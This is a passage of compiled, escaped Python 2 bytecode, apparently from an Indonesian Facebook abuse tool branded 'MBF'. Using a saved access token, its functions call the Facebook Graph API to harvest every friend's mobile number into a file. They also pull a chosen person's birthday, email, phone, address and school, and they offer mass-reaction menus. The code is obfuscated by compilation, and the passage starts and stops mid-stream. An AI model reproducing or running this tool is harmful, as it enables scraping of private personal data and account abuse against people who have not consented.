x00\x00\x00C\x00\x00\x00s{\x00\x00\x00y=\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01t\x04\x00\x83\x00\x00\x01t\x05\x00\x83\x00\x00\x01Wn7\x00\x04t\x06\x00k\n\x00rv\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x07\x00d\t\x00\x83\x01\x00}\x01\x00t\x08\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\n\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\t\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00Ra\x00\x00\x00t\t\x00\x00\x00menu_liket\r\x00\x00\x00menu_perasaanR(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x02\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R6\x00\x00\x00\x08\x02\x00\x00s\x1a\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\n\x01\x07\x01\x07\x01\x0b\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sF\x02\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x06\x00j\x07\x00d\n\x00\x83\x01\x00\x01Wn\x1e\x00\x04t\x08\x00k\n\x00r\x93\x00\x01\x01\x01t\x06\x00j\t\x00d\x0b\x00\x83\x01\x00\x01n\x01\x00Xd\x0c\x00GHd\r\x00d\x0e\x00\x14GHd\x0f\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01d\x10\x00GHd\r\x00d\x06\x00\x14GHy\xf5\x00t\n\x00j\x0b\x00d\x11\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0c\x00j\r\x00|\x02\x00j\x0e\x00\x83\x01\x00}\x03\x00t\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00x\x93\x00|\x03\x00d\x14\x00\x19D]\x87\x00}\x05\x00t\n\x00j\x0b\x00d\x15\x00|\x05\x00d\x16\x00\x19\x17d\x17\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0c\x00j\r\x00|\x06\x00j\x0e\x00\x83\x01\x00}\x07\x00y<\x00|\x04\x00j\x0f\x00|\x07\x00d\x18\x00\x19d\x19\x00\x17\x83\x01\x00\x01d\x1a\x00|\x07\x00d\x1b\x00\x19\x17GHd\x1c\x00|\x07\x00d\x18\x00\x19\x17GHd\r\x00d\x06\x00\x14GHWq\x01\x01\x04t\x10\x00k\n\x00r\x87\x01\x01\x01\x01q\x01\x01Xq\x01\x01W|\x04\x00j\x11\x00\x83\x00\x00\x01d\x1d\x00GHd\x1e\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x08\x00t\x05\x00\x83\x00\x00\x01Wn\x8b\x00\x04t\x12\x00k\n\x00r\xdf\x01\x01\x01\x01d\x1f\x00GHt\x04\x00d\t\x00\x83\x01\x00}\t\x00t\x05\x00\x83\x00\x00\x01nc\x00\x04t\x10\x00k\n\x00r\x07\x0
2\x01\x01\x01d \x00GHt\x04\x00d\t\x00\x83\x01\x00}\n\x00t\x05\x00\x83\x00\x00\x01n;\x00\x04t\n\x00j\x13\x00j\x14\x00t\n\x00j\x13\x00j\x15\x00f\x02\x00k\n\x00rA\x02\x01\x01\x01d!\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x0b\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S("\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]t\x06\x00\x00\x00sampahR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @aabdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMengambil semua nomor teman...s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMulai...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x10\x00\x00\x00sampah/nomor.txtRM\x00\x00\x00Rt\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/R\x1a\x00\x00\x00s\x0e\x00\x00\x00?access_token=t\x0c\x00\x00\x00mobile_phones\x01\x00\x00\x00\ns\x1e\x00\x00\x00\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m R\x19\x00\x00\x00s\x1d\x00\x00\x00\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97ms\x19\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSelesais5\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTersimpan \x1b[1;97m: sampah/nomor.txts\x13\x00\x00\x00\x1b[1;91m[!] Terhentis \x00\x00\x00\x1b[1;91m[X] Gagal mengambil Emails\x18\x00\x00\x00\x1b[1;91m[!] 
Koneksi Error(\x16\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrorR\x15\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00RP\x00\x00\x00R\'\x00\x00\x00R\x86\x00\x00\x00R{\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00t\x14\x00\x00\x00ChunkedEncodingError(\x0c\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00R\x18\x00\x00\x00R*\x00\x00\x00t\x03\x00\x00\x00outRd\x00\x00\x00R\r\x00\x00\x00t\x01\x00\x00\x00zt\x0e\x00\x00\x00inputanyanomort\x0f\x00\x00\x00inputanyanomor1t\x0f\x00\x00\x00inputanyanomor2t\x0f\x00\x00\x00inputanyanomor3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R1\x00\x00\x00\x17\x02\x00\x00sf\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x02\x03\x01\x11\x01\r\x03\x11\x12\x05\x01\t\x01\x05\x01\n\x01\x05\x01\t\x02\x03\x01\x13\x01\x12\x02\x0f\x02\x11\x01\x1f\x01\x12\x02\x03\x01\x15\x01\r\x01\r\x01\r\x01\r\x01\x08\x01\n\x01\x05\x01\x05\x01\x0c\x01\x0b\x02\r\x01\x05\x01\x0c\x01\n\x01\r\x01\x05\x01\x0c\x01\n\x01\x1f\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s]\x01\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xy)\x00t\x06\x00j\x07\x00d\n\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x08\x00j\t\x00|\x02\x00j\n\x00\x83\x01\x00a\x0b\x00Wnt\x00\x04t\x0c\x00k\n\x00r\xc4\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x03\x00t\x05\x00\x83\x00\x00\x01n>\x00\x04t\x06\x00j\r\x00j\x0e\x00k\n\x00r\x01\x01\x01\x01\x01d\x0b\x00GHd\x0c\x00GHt\x02\x00d\r\x00\x83\x01\x00\x01t\x04\x00d\t\x00\x83\x01\x00}\x04\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xx#\x00t\x0b\x00d\x0e\x00\x19D]\x17\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00d\x0f\x00\x19\x83\x01\x00\x01q\r\x01Wd\x10\x00t\x11\x00t\x0f\x00\x83\x01\x00\x16Gt\x12\x00j\x13\x00j\x14\x00\x83\x00\x00\x01t\x02\x00d\x11\x00\x83\x01\x00\x01t\x04\x00d\x12\x00\x83\x01\x00}\x06\x00d\x00\x00S(\x13\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Errors\x14\x00\x00\x00\x1b[1;91m[!] 
Terhenti.i\x03\x00\x00\x00Rt\x00\x00\x00R\x1a\x00\x00\x00s+\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mJumlah teman\x1b[1;97m : %sg-C\x1c\xeb\xe26\x1a?s\x1b\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mEnter...(\x15\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R*\x00\x00\x00R\'\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00t\x06\x00\x00\x00jumlahR#\x00\x00\x00R\x0c\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00(\x07\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00R\x18\x00\x00\x00t\x0c\x00\x00\x00inputerroor1t\r\x00\x00\x00inputanyamor1Rd\x00\x00\x00t\t\x00\x00\x00inputnext(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R2\x00\x00\x00g\x02\x00\x00s>\x00\x00\x00\x00\x02\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x03\x01\x13\x01\x16\x02\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\n\x02\x13\x01\x05\x01\x05\x01\n\x01\x0c\x01\x0b\x02\x11\x01\x15\x03\x0e\x00\r\x00\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00sS\x03\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xt\x06\x00j\x07\x00d\n\x00\x83\x01\x00\x01d\x0b\x00GHd\x0c\x00d\r\x00\x14GHt\x08\x00d\x0e\x00\x83\x01\x00}\x02\x00|\x02\x00d\x0f\x00k\x02\x00r\xa4\x00d\x10\x00GHt\t\x00\x83\x00\x00\x01n\x05\x00d\x11\x00GHx\xa3\x02t\n\x00d\x12\x00\x19D]\x7f\x02}\x03\x00|\x02\x00|\x03\x00d\x13\x00\x19k\x06\x00s\xda\x00|\x02\x00|\x03\x00d\x14\x00\x19k\x06\x00r\xb4\x00t\x0b\x00j\x0c\x00d\x15\x00|\x03\x00d\x14\x00\x19\x17d\x16\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00d\x17\x00GHd\x18\x00|\x05\x00d\x13\x00\x19\x17d\x19\x00\x17GHy\x11\x00d\x1a\x00|\x03\x00d\x14\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00rE\x01\x01\x01\x01n\x01\x00Xy\x11\x00d\x1b\x00|\x05\x00d\x1c\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00rj\x01\x01\x01\x01n\x01\x00Xy\x11\x00d\x1d\x00|\x05\x00d\x13\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\x8f\x01\x01\x01\x01n\x01\x00Xy\x11\x00d\x1e\x00|\x05\x00d\x1f\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xb4\x01\x01\x01\x01n\x01\x00Xy\x11\x00d 
\x00|\x05\x00d!\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xd9\x01\x01\x01\x01n\x01\x00Xy\x11\x00d"\x00|\x05\x00d#\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xfe\x01\x01\x01\x01n\x01\x00Xy\x1d\x00d$\x00|\x05\x00d%\x00\x19j\x11\x00d&\x00d\'\x00\x83\x02\x00\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r/\x02\x01\x01\x01n\x01\x00Xy\x11\x00d(\x00|\x05\x00d)\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00rT\x02\x01\x01\x01n\x01\x00Xy\x11\x00d*\x00|\x05\x00d+\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00ry\x02\x01\x01\x01n\x01\x00Xy\x1e\x00d,\x00|\x05\x00d-\x00\x19j\x12\x00d.\x00\x83\x01\x00d/\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xab\x02\x01\x01\x01n\x01\x00Xy\x15\x00d0\x00|\x05\x00d1\x00\x19d\x13\x00\x19\x17GHWn\x11\x00\x04t\x10\x00k\n\x00r\xd4\x02\x01\x01\x01n\x01\x00XyG\x00d2\x00GHx;\x00|\x05\x00d3\x00\x19D]/\x00}\x03\x00y\x15\x00d4\x00|\x03\x00d5\x00\x19d\x13\x00\x19\x17GHWq\xe8\x02\x04t\x10\x00k\n\x00r\x16\x03\x01\x01\x01q\xe8\x02Xq\xe8\x02WWq3\x03\x04t\x10\x00k\n\x00r/\x03\x01\x01\x01q3\x03Xq\xb4\x00q\xb4\x00Wd6\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x06\x00t\x05\x00\x83\x00\x00\x01d\x00\x00S(7\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMasukkan Nama/ID teman\x1b[1;97m : R\\\x00\x00\x00s\x13\x00\x00\x00\x1b[1;91m[!] Masukkans\x1c\x00\x00\x00\x1b[1;91m[+]\x1b[1;92m Mencari...Rt\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=Rf\x00\x00\x00s,\x00\x00\x00\x1b[1;91m[!] \x1b[1;97m---------- \x1b[1;91m[\x1b[1;96ms%\x00\x00\x00\x1b[1;91m] \x1b[1;97m---------- \x1b[1;91m[!]s\'\x00\x00\x00\n\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mUsername\x1b[1;97m : t\x08\x00\x00\x00usernames&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama depan\x1b[1;97m : t\n\x00\x00\x00first_names&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama tengah\x1b[1;97m: t\x0b\x00\x00\x00middle_names&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama akhir\x1b[1;97m : t\t\x00\x00\x00last_names&\x00\x00\x00\x1b[1;91m[?] 
\x1b[1;92mTgl Lahir\x1b[1;97m : t\x08\x00\x00\x00birthdayt\x01\x00\x00\x00/t\x01\x00\x00\x00-s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : R;\x00\x00\x00s\'\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : R\xbf\x00\x00\x00s"\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : R\x97\x00\x00\x00t\x01\x00\x00\x00_i\x00\x00\x00\x00s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mAlamat\x1b[1;97m : t\x08\x00\x00\x00locations&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mSekolah\x1b[1;97m : t\t\x00\x00\x00educations \x00\x00\x00 \x1b[1;91m ~ \x1b[1;97mt\x06\x00\x00\x00schools\x1a\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mSelesai(\x13\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R3\x00\x00\x00R*\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\'\x00\x00\x00R`\x00\x00\x00Ri\x00\x00\x00(\x07\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00t\x06\x00\x00\x00targetRd\x00\x00\x00R\r\x00\x00\x00R\x85\x00\x00\x00t\x0e\x00\x00\x00inputerrorpass(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R3\x00\x00\x00\x8d\x02\x00\x00s\xa2\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x02\r\x12\x05\x01\t\x01\x0c\x02\x0c\x01\x05\x01\n\x02\x05\x01\x11\x02 \x02\x1f\x01\x12\x02\x05\x01\x11\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x1d\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x1e\x01\r\x01\x04\x01\x03\x01\x15\x01\r\x01\x04\x01\x03\x01\x05\x01\x11\x01\x03\x01\x15\x01\r\x01\x0c\x01\r\x01\x07\x02\x04\x03\x05\x01\x0c\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x03\x00d\x04\x00\x14GHd\x00\x00S(\x05\x00\x00\x00NR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : 
\x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_(\x02\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>Ra\x00\x00\x00\xfc\x02\x00\x00s\x06\x00\x00\x00\x00\x01\r\x12\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s,\x00\x00\x00d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHd\x05\x00GHd\x06\x00GHd\x07\x00GHd\x08\x00GHd\x00\x00S(\t\x00\x00\x00Ns%\x00\x00\x00\x1b[1;96m[\x1b[1;97m1.\x1b[1;96m] \x1b[1;96mLikes(\x00\x00\x00\x1b[1;95m[\x1b[1;97m2.\x1b[1;95m] \x1b[1;95mLove <3s\'\x00\x00\x00\x1b[1;94m[\x1b[1;97m3.\x1b[1;94m] \x1b[1;94mWow :0s(\x00\x00\x00\x1b[1;93m[\x1b[1;97m4.\x1b[1;93m] \x1b[1;93mHaha :vs)\x00\x00\x00\x1b[1;97m[\x1b[1;97m5.\x1b[1;97m] \x1b[1;97mSedih :(s*\x00\x00\x00\x1b[1;91m[\x1b[1;97m6.\x1b[1;91m] \x1b[1;91mMarah >:(s\x16\x00\x00\x00\x1b[1;97m---------------s(\x00\x00\x00\x1b[1;91m[\x1b[1;97m7.\x1b[1;91m] \x1b[1;91mKembali(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\xbc\x00\x00\x00\x11\x03\x00\x00s\x10\x00\x00\x00\x00\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHd\x00\x00S(\x05\x00\x00\x00Ns\'\x00\x00\x00\x1b[1;91m[\x1b[1;97m1.\x1b[1;91m] \x1b[1;92mTargets(\x00\x00\x00\x1b[1;91m[\x1b[1;97m2.\x1b[1;91m] \x1b[1;92mBerandas\x16\x00\x00\x00\x1b[1;97m---------------s(\x00\x00\x00\x1b[1;91m[\x1b[1;97m3.\x1b[1;91m] 